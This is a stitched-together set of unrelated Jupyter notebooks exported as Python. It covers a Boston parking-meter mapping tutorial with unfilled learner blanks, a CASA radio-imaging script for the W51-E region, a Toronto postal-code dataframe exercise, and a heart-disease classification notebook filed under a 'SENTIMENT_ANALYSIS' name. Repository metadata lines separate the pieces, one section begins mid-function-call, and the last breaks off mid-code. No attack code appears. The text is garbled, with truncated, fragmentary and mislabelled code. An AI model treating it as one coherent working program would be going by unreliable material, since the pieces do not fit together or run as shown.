# #### How many cells are missing Data?
#
# Syntax:
# *`dataframe`*`.isnull().sum()`
#
# Calculate missing values
# #### Finding all unique values
# Dataframe 1 tells us which vendors service the meters in the "VENDOR" column. How many vendors service the boston area meters?
# Syntax: *`dataframe.column`*`.unique()`
print(boston_meters.VENDOR.unique())
# +
# What are the distinct types of pay policies for meters?
print()
# -
#
#
#
#
# ## Step 4: Reorganizing the Data
# #### Dropping Columns and Rows
# Since we will ultimately be putting this data on a map, we would like to drop all values that don't include a location. We will filter which NaN values to drop by specifying a subset of columns.
#
# Syntax:
# *`DataFrame`*`.dropna(axis=0, how='any', thresh=None, subset=None, inplace=False)`
# DataFrame.drop(self, labels=None, axis=0, index=None, columns=None, level=None, inplace=False, errors='raise')
edited_columns = boston_meters.drop(['TOW_AWAY','G_DISTRICT', 'G_ZONE', 'G_SUBZONE', 'METER_ID'], axis=1)
edited_columns.head()
# You can also drop no data values
#
# Syntax:
# *`dataframe`*`.dropna(subset=['column1', 'column2'])`
#
# +
#Drop the rows that have no data in columns: LATITUDE AND LONGITUDE
#no_na =
# -
# ##### Merging Dataframes
#
# 
#
# We have a dataframe listing parking meters for Charlestown and another dataframe listing parking meters for Boston.
# Try combining these two into one dataframe.
#
#
# Syntax: *`dataframe`*`.merge(`*`dataframe_2`*`, how = "")` (Default is inner merge)
#
#We will merge charlestown_pay & charlestown_locations
charlestown_meters = charlestown_pay.merge(charlestown_locations, how="outer")
all_meters = no_na.append(charlestown_meters, sort=True)
# #### Filtering
# Sometimes you may only want data with certain attributes. You can filter the data and save to a new dataframe or delete data from the table. It can also be useful in cases where you want a count of the data that matches your query.
sun = all_meters[all_meters[''].str.contains('', na=False)]
print(sun)
#
# 
# One way to do this is to check if the cell contains a certain string (remember a string is a sequence of characters).
# syntax: *`dataframe[dataframe['column']`*`.str.contains(`*`'string we are looking for'`*`)]`
#
# This will return all result that evaluate to true. In the next example we want all the results that *do not contain* a certain string. We are in luck! We can easily invert our results by including *`~`* in front of the dataframe path like this: *`dataframe[~ dataframe['column']`*
#
#
#
# Some additional methods include `str.startswith("")` and `str.endswith("")`
#
# +
# let's find out what meters don't require payment on saturdays
# we have included the optional parameter "na=False" to exclude no data values, which can neither be true nor false
free_saturdays = all_meters[~ all_meters['PAY_POLICY'].str.contains('SAT', na=False)]
print(free_saturdays)
free_saturday = pd.DataFrame(free_saturdays).reset_index(drop=True)
# -
# # Reverse GeoCoding
locator = Nominatim(user_agent="test")
coordinates = "53.480837, -2.244914"
location = locator.reverse(coordinates)
location.raw
#create a dataframe geometry column which combines lat and long
free_saturday["geom"] = free_saturday["LATITUDE"].map(str) + "," + free_saturday["LONGITUDE"].map(str)
free_saturday.head()
# +
# Define reverse Geocoding function
locator = Nominatim(user_agent="free_parking_saturdays", timeout=10)
reverse_geocode = RateLimiter(locator.reverse, min_delay_seconds=.01)
#Create Address Column variable and call the function we created
free_saturday["address"] = free_saturday["geom"].apply(reverse_geocode)
#Check out results
free_saturday.head()
# -
# # Sep Lists in Columns
# ## Step 5: Mapping the Data
# #### Initializing the map
# Start by creating a map object. We need to start by specifying where the map should be and what basemap to use.
#
# Syntax:
# foilum.Map(location=[latitude, longitude], zoom_start = #, tiles='optional custom tiles')
#
# Note: Higher numbers correspond to higher zoom level
#
# +
map = folium.Map(location=[42.3621, -71.0570], zoom_start = 14, tiles='Stamen Toner')
numMarkers = len(free_saturday)
for i in range(0,numMarkers):
try:
longitude = float(free_saturday.iloc[i]['LONGITUDE'])
latitude = float(free_saturday.iloc[i]['LATITUDE'])
location = [latitude, longitude]
popup_text = free_saturday.iloc[i]['address']
folium.CircleMarker(location=location, radius=10, popup=popup_text, color='#FA8072', fill=True, fill_color='#FA8072').add_to(map)
except Exception as exception:
print("exception:", exception)
pass
map
# -
# ## Step 6: Exporting Files
#
# Now we want to save the file we have just created. We could save it as a CSV, but suppose we need it in other formats? Let's write it out to a GeoJSON using built in functionality from the GeoPandas Library.
# Syntax:
# gdf = geopandas.GeoDataFrame(
# df, geometry=geopandas.points_from_xy(df.Longitude, df.Latitude))
# +
geo_dataframe = gp.GeoDataFrame(free_saturdays, geometry=gp.points_from_xy(free_saturdays.LONGITUDE, free_saturdays.LATITUDE))
print(geo_dataframe.head())
# -
geo_dataframe.to_file("", driver='GeoJSON')
ms=False,
cfcache="", usepointing=False, computepastep=360.0, rotatepastep=360.0,
pointingoffsetsigdev=[], pblimit=0.1, normtype="flatnoise",
deconvolver="mtmfs", scales=[0, 3, 9], nterms=2, smallscalebias=0.0,
restoration=True, restoringbeam=[], pbcor=True, outlierfile="",
weighting="briggs", robust=0, noise="1.0Jy", npixels=0, uvtaper=[],
niter=10000, gain=0.1, threshold="0.2mJy", nsigma=0.0, cycleniter=-1,
cyclefactor=1.0, minpsffraction=0.05, maxpsffraction=0.8,
interactive=False, usemask="user",
mask="../reduction/reduction/clean_regions/W51E_Bright.crtf",
pbmask=0.0,
sidelobethreshold=3.0, noisethreshold=5.0, lownoisethreshold=1.5,
negativethreshold=0.0, smoothfactor=1.0, minbeamfrac=0.3,
cutthreshold=0.01, growiterations=75, dogrowprune=True,
minpercentchange=-1.0, verbose=False, fastnoise=True, restart=True,
savemodel="none", calcres=True, calcpsf=True, parallel=False)
tclean(vis=selfcal_ms,
selectdata=True, field="W51-E", spw="", timerange="", uvrange="",
antenna="DA41,DA42,DA43,DA44,DA45,DA46,DA47,DA49,DA50,DA51,DA52,DA53,DA54,DA55,DA56,DA57,DA58,DA59,DA61,DA62,DA63,DA65,DV01,DV03,DV04,DV06,DV07,DV08,DV09,DV10,DV11,DV12,DV13,DV14,DV15,DV16,DV17,DV19,DV20,DV23,DV24,DV25,PM01,PM02,PM03,DA60,DA64,DV05,DV22,DA48,DA49,DA51,DA60,DV01,DV15,DV23,PM03,PM04,DA53,DA46,DV10,DA42,DA43,DA44,DA45,DA46,DA47,DA50,DA51,DA55,DA56,DA57,DA58,DA61,DA62,DV02,DV03,DV07,DV11,DV12,DV14,DV19,DV21",
scan="", observation="", intent="", datacolumn="corrected",
imagename="imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_dec17ms_clean",
imsize=[4800, 4800], cell=['0.0375arcsec', '0.0375arcsec'],
phasecenter="ICRS 290.934083333deg 14.5081943683deg",
stokes="I",
projection="SIN",
startmodel=['imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7.model.tt0',
'imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7.model.tt1'],
specmode="mfs", reffreq="", nchan=-1, start="",
width="", outframe="LSRK", veltype="radio", restfreq=[],
interpolation="linear", perchanweightdensity=True, gridder="mosaic",
facets=1, chanchunks=1, wprojplanes=1, vptable="",
mosweight=True, aterm=True, psterm=False, wbawp=True, conjbeams=False,
cfcache="", usepointing=False, computepastep=360.0, rotatepastep=360.0,
pointingoffsetsigdev=[], pblimit=0.1, normtype="flatnoise",
deconvolver="mtmfs", scales=[0, 3, 9], nterms=2, smallscalebias=0.0,
restoration=True, restoringbeam=[], pbcor=True, outlierfile="",
weighting="briggs", robust=0, noise="1.0Jy", npixels=0, uvtaper=[],
niter=10000, gain=0.1, threshold="0.2mJy", nsigma=0.0, cycleniter=-1,
cyclefactor=1.0, minpsffraction=0.05, maxpsffraction=0.8,
interactive=False, usemask="user",
mask="../reduction/reduction/clean_regions/W51E_Bright.crtf",
pbmask=0.0,
sidelobethreshold=3.0, noisethreshold=5.0, lownoisethreshold=1.5,
negativethreshold=0.0, smoothfactor=1.0, minbeamfrac=0.3,
cutthreshold=0.01, growiterations=75, dogrowprune=True,
minpercentchange=-1.0, verbose=False, fastnoise=True, restart=True,
savemodel="none", calcres=True, calcpsf=True, parallel=False)
finaliter_prefix = "imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_non2h_brightmask_dirty"
cutoutregion = 'fk5; box(19:23:43.93,+14:30:34.8,5",5")'
pl.figure(figsize=(22,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,1).imshow(image[0].value, norm=simple_norm(image[0].value, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("image.tt0")
imagett1 = SpectralCube.read(f'{finaliter_prefix}.image.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,2).imshow(imagett1[0].value, norm=simple_norm(imagett1[0].value, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("image.tt1")
residual = SpectralCube.read(f'{finaliter_prefix}.residual.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,6).imshow(residual[0].value, norm=simple_norm(residual[0].value, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("residual.tt0")
residualtt1 = SpectralCube.read(f'{finaliter_prefix}.residual.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,7).imshow(residualtt1[0].value, norm=simple_norm(residualtt1[0].value, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("residual.tt1")
alpha = SpectralCube.read(f'{finaliter_prefix}.alpha', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,3).imshow(alpha[0].value, norm=simple_norm(alpha[0].value, stretch='linear', min_cut=-2, max_cut=4));
pl.title("alpha")
model = SpectralCube.read(f'{finaliter_prefix}.model.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,4).imshow(model[0].value, norm=simple_norm(model[0].value, stretch='log', max_percent=99.995, min_percent=1));
pl.title("model.tt0")
modeltt1 = SpectralCube.read(f'{finaliter_prefix}.model.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,5).imshow(modeltt1[0].value, norm=simple_norm(modeltt1[0].value, stretch='log', max_percent=99.995, min_percent=1));
pl.title("model.tt1")
cutoutregion = 'fk5; box(19:23:43.93,+14:30:34.8,35",35")'
pl.figure(figsize=(22,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,1).imshow(image[0].value, norm=simple_norm(image[0].value, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("image.tt0")
imagett1 = SpectralCube.read(f'{finaliter_prefix}.image.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,2).imshow(imagett1[0].value, norm=simple_norm(imagett1[0].value, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("image.tt1")
residual = SpectralCube.read(f'{finaliter_prefix}.residual.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,6).imshow(residual[0].value, norm=simple_norm(residual[0].value, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("residual.tt0")
residualtt1 = SpectralCube.read(f'{finaliter_prefix}.residual.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,7).imshow(residualtt1[0].value, norm=simple_norm(residualtt1[0].value, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
pl.title("residual.tt1")
alpha = SpectralCube.read(f'{finaliter_prefix}.alpha', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,3).imshow(alpha[0].value, norm=simple_norm(alpha[0].value, stretch='linear', min_cut=-2, max_cut=4));
pl.title("alpha")
model = SpectralCube.read(f'{finaliter_prefix}.model.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,4).imshow(model[0].value, norm=simple_norm(model[0].value, stretch='log', max_percent=99.995, min_percent=1));
pl.title("model.tt0")
modeltt1 = SpectralCube.read(f'{finaliter_prefix}.model.tt1', format='casa_image').subcube_from_ds9region(cutoutregion)
pl.subplot(2,5,5).imshow(modeltt1[0].value, norm=simple_norm(modeltt1[0].value, stretch='log', max_percent=99.995, min_percent=1));
pl.title("model.tt1")
pipeline_pfx = "imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter"
pipe_image = SpectralCube.read(f'{pipeline_pfx}.image.tt0', format='casa_image')
# +
cutoutregion = 'fk5; box(19:23:43.93,+14:30:34.8,45",65")'
pl.figure(figsize=(20,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
ax1 = pl.subplot(1,3,1)
ax1.imshow(image[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax1.set_title("image.tt0")
ax2 = pl.subplot(1,3,2)
im2 = pipe_image.subcube_from_ds9region(cutoutregion)
ax2.imshow(im2[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax3 = pl.subplot(1,3,3)
im3 = im2[0].value-image[0].value
ax3.imshow(im3, norm=simple_norm(im3, max_percent=99, min_percent=1, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
# -
finaliter_prefix = "imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_non2h_brightmask_clean"
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
# +
cutoutregion = 'fk5; box(19:23:43.93,+14:30:34.8,45",65")'
pl.figure(figsize=(20,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
ax1 = pl.subplot(1,3,1)
ax1.imshow(image[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax1.set_title("image.tt0")
ax2 = pl.subplot(1,3,2)
im2 = pipe_image.subcube_from_ds9region(cutoutregion)
ax2.imshow(im2[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax3 = pl.subplot(1,3,3)
im3 = im2[0].value-image[0].value
ax3.imshow(im3, norm=simple_norm(im3, max_percent=99, min_percent=1, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
# +
cutoutregion = 'fk5; box(19:23:43.93,+14:30:27.8,6",7")'
pl.figure(figsize=(20,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
ax1 = pl.subplot(1,3,1)
ax1.imshow(image[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax1.set_title("image.tt0")
ax2 = pl.subplot(1,3,2)
im2 = pipe_image.subcube_from_ds9region(cutoutregion)
ax2.imshow(im2[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax3 = pl.subplot(1,3,3)
im3 = im2[0].value-image[0].value
ax3.imshow(im3, norm=simple_norm(im3, max_percent=99, min_percent=1, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
# -
# ls -d imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_dec17ms*
# +
finaliter_prefix = "imaging_results/W51-E_B3_uid___A001_X1296_X10b_continuum_merged_12M_robust0_selfcal7_finaliter_dec17ms_dirty"
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
cutoutregion = 'fk5; box(19:23:42.93,+14:30:34.8,45",65")'
pl.figure(figsize=(20,8))
image = SpectralCube.read(f'{finaliter_prefix}.image.tt0', format='casa_image').subcube_from_ds9region(cutoutregion)
ax1 = pl.subplot(1,3,1)
ax1.imshow(image[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax1.set_title("image.tt0")
ax2 = pl.subplot(1,3,2)
im2 = pipe_image.subcube_from_ds9region(cutoutregion)
ax2.imshow(im2[0].value, norm=simple_norm(image[0].value, max_percent=99.95, min_percent=1, stretch='log')); pl.colorbar(mappable=pl.gca().images[0])
ax3 = pl.subplot(1,3,3)
im3 = im2[0].value-image[0].value
ax3.imshow(im3, norm=simple_norm(im3, max_percent=99, min_percent=1, stretch='linear')); pl.colorbar(mappable=pl.gca().images[0])
# -
| 21,466 |
/TorontoNeighbourhood_version2.ipynb
|
9bc1e1ae0221a3896465865229040b542692fb08
|
[] |
no_license
|
gabrielmergea/Coursera_Capstone-1
|
https://github.com/gabrielmergea/Coursera_Capstone-1
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 98,554 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python3
# ---
import pandas as pd
import pylab as pl
import numpy as np
# # Q1 DataFrame
# I convert the Wikipedia' table into csv file
# +
# The code was removed by Watson Studio for sharing.
# -
df.shape
import re
df = df[~df['Borough'].str.contains('Not assigned')]
print(type(df['Neighbourhood']))
new_df = df.groupby(by = ('Postcode', 'Borough'))
print(new_df['Neighbourhood'])
new_df = new_df['Neighbourhood'].unique()
new_df = pd.DataFrame(new_df)
new_df = new_df.reset_index(level=0)
new_df = new_df.reset_index(level=0)
new_df
new_df.ix[1,'Neighbourhood']
# +
for i in new_df.index:
if ('Not assigned' in new_df.loc[i, 'Neighbourhood']):
new_df.ix[i,'Neighbourhood'] = new_df.ix[i,'Borough']
new_df
# -
new_df = new_df.reindex(columns = ['Postcode', 'Borough', 'Neighbourhood'])
new_df.rename(columns = {'Postcode' : 'PostalCode'}, inplace = True)
new_df
new_df.shape
# # Q2 Get longitude and latitude
# I choose to read the csv file
df_geo = pd.read_csv('https://cocl.us/Geospatial_data')
df_geo.rename(columns = {"Postal Code" : 'PostalCode'}, inplace = True)
df_geo
new_df['PostalCode'].astype(str)
new_df['PostalCode'] = new_df['PostalCode'].astype(str)
df_geo['PostalCode'] = df_geo['PostalCode'].astype(str)
new2_df = pd.merge(new_df, df_geo, on = 'PostalCode')
new2_df
| 1,577 |
/SENTIMENT_ANALYSIS.ipynb
|
0be080f3e26c86f04aba5e4d2135bbcad8fa4ba1
|
[] |
no_license
|
pratikshanikum16/SENTIMENT-ANALYSIS
|
https://github.com/pratikshanikum16/SENTIMENT-ANALYSIS
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 7,854 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from scipy.stats import gaussian_kde
import seaborn
import plotly
import plotly.graph_objs as go
from plotly import tools
import plotly.figure_factory as ff
############## OFFLINE ##############
plotly.offline.init_notebook_mode(connected=True)
#to plot offline: ##plotly.offline.iplot##
############## ONLINE ##############
#plotly.tools.set_credentials_file(username='arnaurovira23', api_key='7y46ugRJ8Rl6XCkCwBGM')
#to plot online: ##py.iplot##
import plotly.plotly as py
import warnings
warnings.filterwarnings('ignore')
# -
# ### target dataset
df_target = pd.read_csv('train_lables.txt')
df_target.head()
print(f' How many unique values are in target column? {len(df_target.heart_disease_present.unique())}')
df_target['heart_disease_present'].unique()
#Shape of target dataset
num_target = df_target.shape[0]
print(num_target)
# ### train dataset
df_train = pd.read_csv('train_values.txt')
df_train.head()
df_train.describe()
#Shape of train dataset
num_train = df_train.shape[0]
print(f' Shpae of dataset train: {num_train}')
# ##### features
features_all = df_train.columns.tolist()
features_all.remove('patient_id')
print(features_all)
print(len(features_all))
print(f'How many NaN values are in df_train set? {df_train.isnull().sum().sum()}')
print(f'How many unique values are in thal column? {len(df_train.thal.unique())}')
print(df_train['thal'].unique())
df_train.info()
# ### test dataset
df_test = pd.read_csv('test_values.txt')
df_test.head()
#Shape of test dataset
num_test = df_test.shape[0]
print(f' Shpae of dataset test: {num_test}')
df_test.describe()
df_test.info()
print(f'How many NaN values are in df_test set? {df_test.isnull().sum().sum()}')
print(f'How many unique values are in thal column? {len(df_test.thal.unique())}')
print(df_test['thal'].unique())
features_all_test = df_test.columns.tolist()
features_all_test.remove('patient_id')
print(features_all_test)
print(len(features_all_test))
# ### merge train & target dataset
df_final = df_train.merge(df_target, on = 'patient_id' , how = 'left')
df_final.head()
df_final.dtypes
# ##### features dataset final
df_final['heart_disease_present'].value_counts()
targets = df_final['heart_disease_present'].unique()
num_targets = len(targets)
print(targets)
print(num_targets)
features_num = df_final.select_dtypes(include=['int64','float']).columns.to_list()
features_num.remove('heart_disease_present')
print(features_num)
print(len(features_num))
df_final['heart_disease_present'].value_counts()
# +
targets_plot = [go.Bar(y = df_final['heart_disease_present'].value_counts(),\
marker = dict(color = ['rgba(204,204,204,1)', 'rgba(222,45,38,0.8)']))]
layout = go.Layout(title='heart_disease_present Count',width=400, height=400, xaxis= dict(dtick=1))
fig = go.Figure(targets_plot, layout=layout)
plotly.offline.iplot(fig)
# -
# ### Train vs test comparision
# +
fig, axs = plt.subplots(3, 4, figsize=(40, 20))
axs = axs.flatten()
for i, (ax, feature) in enumerate(zip(axs, features_num)):
sns.kdeplot(df_train[feature], label="train", ax=ax)
sns.kdeplot(df_test[feature], label="test", ax=ax)
ax.set_title(feature)
sns.set(font_scale=3)
sns.set_style("ticks")
ax.legend(frameon=False)
plt.tight_layout()
# -
# # EDA
features_count = ['resting_ekg_results','slope_of_peak_exercise_st_segment','chest_pain_type','num_major_vessels','fasting_blood_sugar_gt_120_mg_per_dl','sex','exercise_induced_angina']
features_kde = [ 'resting_blood_pressure', 'serum_cholesterol_mg_per_dl', 'oldpeak_eq_st_depression', 'age', 'max_heart_rate_achieved']
# +
fig, axs = plt.subplots(ncols = 5, figsize=(20, 6))
axs = axs.flatten()
for i, (ax, feature) in enumerate(zip(axs, features_kde)):
sns.kdeplot(df_final[df_final['heart_disease_present']==0][feature], label = 0, ax=ax)
sns.kdeplot(df_final[df_final['heart_disease_present']==1][feature], label = 1, ax=ax)
ax.set_title(feature)
sns.set(font_scale=1.5)
sns.set_style("ticks")
ax.legend(frameon=False)
plt.tight_layout()
# +
fig, axs = plt.subplots(2,4,figsize=(30,15))
axs = axs.flatten()
for i,(ax, feature) in enumerate (zip(axs, features_count)):
gb_0 = df_final[[feature, 'heart_disease_present']][df_final['heart_disease_present'] == 0].groupby(feature).count().rename(columns = {'heart_disease_present':'0'})
gb_1 = df_final[[feature, 'heart_disease_present']][df_final['heart_disease_present'] == 1].groupby(feature).count().rename(columns = {'heart_disease_present':'1'})
gb_plot = gb_0.merge(gb_1, on = feature).reset_index()
gb_plot = pd.melt(gb_plot, id_vars = feature, value_vars=['0','1']).rename(columns = {'variable':'heart_disease_present'})
sns.barplot(data = gb_plot, x = feature , y='value' ,hue = 'heart_disease_present', ax = ax)
sns.set(font_scale=1.5)
sns.set_style("ticks")
ax.legend(frameon=False)
plt.tight_layout()
# -
# ### combine target and test set
df_combine = pd.concat([df_final, df_test], sort = False)
len_train = df_train.shape[0]
len_test = df_test.shape[0]
# ### dummies EDA
feature_dummies = ['thal_fixed_defect','thal_normal','thal_reversible_defect']
df_combine = pd.get_dummies(df_combine, columns = ['thal'])
df_final[['thal','heart_disease_present']].groupby('thal').mean()
fig, axs = plt.subplots(figsize=(20,6),ncols=3)
for i,feature in enumerate (feature_dummies):
count = df_combine[:len_train][[feature,'heart_disease_present']].groupby('heart_disease_present').sum().reset_index()
sns.barplot(data = count, x = 'heart_disease_present', y = feature, ax = axs[i])
sns.set(font_scale=1)
sns.set_style("ticks")
# # Feature engineering
# ##### Dummies
df_combine = pd.get_dummies(df_combine, columns=['slope_of_peak_exercise_st_segment','chest_pain_type','num_major_vessels'])
df_combine.head()
# # Feature correlation
features_corr = df_train_final = df_combine[:len_train].select_dtypes(include=['int','float','uint8']).columns.to_list()
features_corr
# ##### Pearson correlation
# +
# Compute Pearson correlation for every pair of features
# Use only training data
pcorrs = pd.DataFrame(df_combine[:len_train][features_corr].corr()['heart_disease_present'].sort_values()).reset_index()
pcorrs = pcorrs.rename(columns = {'index':'feature', 'heart_disease_present':'pcorr'})
print('Most negatively correlated variables:')
pcorrs.head()
# -
print('Most positively correlated variables:')
pcorrs.tail()
# ##### Spearman correlation
# +
# Compute Spearman correlation for every features
# Use only training data
from scipy.stats import spearmanr
feats = []
scorr = []
pvalues = []
for feat in features_corr:
# Calculate spearman correlation
scorr.append(spearmanr(df_combine[:len_train][feat], df_combine[:len_train]['heart_disease_present']).correlation)
pvalues.append(spearmanr(df_combine[:len_train][feat], df_combine[:len_train]['heart_disease_present']).pvalue)
scorrs = pd.DataFrame({'feature': features_corr, 'scorr':scorr, 'pvalue':pvalues}).sort_values('scorr')
print('Most negatively correlated variables:')
scorrs.head()
# -
print('Most positively correlated variables:')
scorrs.tail()
# ##### Compute features for which Pearson and Spearman correlation differs the most
corrs = pcorrs.merge(scorrs, on = 'feature')
corrs['diff'] = corrs['pcorr'] - corrs['scorr']
corrs.sort_values('diff')
plt.figure(figsize=(15, 10))
sns.set(font_scale=0.75)
sns.heatmap(df_combine[:len_train][features_corr].corr(), square=True, cmap='RdYlGn',annot=True,annot_kws={'size': 5},fmt='.2f')
# ###### drop most related features
df_combine.drop(columns = ['thal_normal','resting_blood_pressure'], inplace = True)
df_combine.head()
# Anomanar datasets per model prediction
df_train_final = df_combine[:len_train]
df_test_final = df_combine[len_train:]
# # Model and prediction
# +
from sklearn.model_selection import cross_val_score
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import train_test_split
from sklearn.metrics import log_loss, confusion_matrix, classification_report, roc_auc_score, roc_curve, make_scorer, f1_score
from sklearn.preprocessing import MinMaxScaler, Normalizer, StandardScaler, PolynomialFeatures
from sklearn.feature_selection import SelectFromModel
from sklearn.pipeline import Pipeline
from sklearn.model_selection import StratifiedKFold, KFold
# Since the dataset is class-balanced, we can use macro averaging for the F1 scorer
scorer = make_scorer(f1_score, greater_is_better=True, average = 'macro')
# +
# Extract training data and labels
train_set = df_train_final.drop(columns = ['patient_id','heart_disease_present'])
test_set = df_test_final.drop(columns = ['patient_id','heart_disease_present'])
test_ids = df_test_final['patient_id'].values
train_labels = np.asarray(df_train_final['heart_disease_present'])
[num_examples,num_feat] = train_set.shape
# Submission base which is used for making submissions to the competition
submission_base = df_combine[len_train:][['patient_id']].copy()
print(train_set.shape)
print(test_set.shape)
print(train_labels.shape)
# -
# Using stratified kfold cross validation
nfolds = 10
strkfold = StratifiedKFold(n_splits = nfolds, shuffle = True)
# ##### Routine to train a model with cross-validation and append the results to a dataframe
# +
model_results = pd.DataFrame(columns = ['model','cv_scores'])
def run_cv_model_f1(model, train_set, train_labels, name, model_results = None):
cv_scores = cross_val_score(model, train_set, train_labels, cv=strkfold, scoring=scorer)
print(f'{strkfold.n_splits}-Fold Cross Validation F1 Score = \
{round(cv_scores.mean(), 4)} with std = {round(cv_scores.std(), 4)}')
if model_results is not None:
model_results = model_results.append(pd.DataFrame({'model':name,'cv_scores':cv_scores}),ignore_index=True)
return model_results
# +
model_logloss = pd.DataFrame(columns = ['model','Neglogloss_scores'])
def run_cv_model_logloss(model, train_set, train_labels, name, model_logloss = None):
cv_scores = cross_val_score(model, train_set, train_labels, cv=strkfold, scoring='neg_log_loss')
print(f'{strkfold.n_splits}-Fold Cross Validation Neg Log Loss = \
{round(-1*(cv_scores.mean()), 4)} with std = {round(cv_scores.std(), 4)}')
if model_logloss is not None:
model_logloss = model_logloss.append(pd.DataFrame({'model':name,'Neglogloss_scores':-1*(cv_scores)}),ignore_index=True)
return model_logloss
# -
# ##### Routine to plot feature importances
def plot_feature_importance (df, n = 10, threshold = None):
"""Plots n most important features. Also plots the cumulative importance if
threshold is specified and prints the number of features needed to reach threshold cumulative importance.
Intended for use with any tree-based feature importances.
Args:
df (dataframe): Dataframe of feature importances. Columns must be "feature" and "importance".
n (int): Number of most important features to plot. Default is 10.
threshold (float): Threshold for cumulative importance plot. If not provided, no plot is made. Default is None.
Returns:
df (dataframe): Dataframe ordered by feature importances with a normalized column (sums to 1)
and a cumulative importance column
Note:
* Normalization in this case means sums to 1.
* Cumulative importance is calculated by summing features from most to least important
* A threshold of x will show the most important features needed to reach 100*x% of cumulative importance
"""
# Sort features with most important at the head
df = df.sort_values('importance', ascending = False).reset_index(drop = True)
# Normalize the feature importances to add up to one and calculate cumulative importance
df['importance_normalized'] = df['importance']/df['importance'].sum()
df['cumulative_importance'] = np.cumsum(df['importance_normalized'])
# Bar plot of n most important features
trace0 = go.Bar(y = df.loc[:n, 'feature'],\
x = df.loc[:n, 'importance_normalized'],\
marker = dict(color = 'rgba(50, 171, 96, 0.6)',\
line = dict(color = 'rgba(50, 171, 96, 1.0)',\
width = 1),),\
orientation = 'h')
layout = go.Layout(title = 'Normalized importance of features',\
yaxis = dict(autorange = 'reversed',\
tickangle = 0,\
automargin = True),\
width = 800)
fig = go.Figure(data = [trace0], layout = layout)
plotly.offline.iplot(fig, filename='norm-importance')
if threshold:
# Number of features needed for threshold cumulative importance
# This is the index (will need to add 1 for the actual number)
importance_index = np.min(np.where(df['cumulative_importance'] > threshold))
# Cumulative importance plot
trace0 = go.Scatter(x = df.index,\
y = df['cumulative_importance'],\
line = dict(color = 'blue'))
trace1 = go.Scatter(x = [importance_index + 1, importance_index + 1],\
y = [0, 1.02],\
line = dict(color = 'red',\
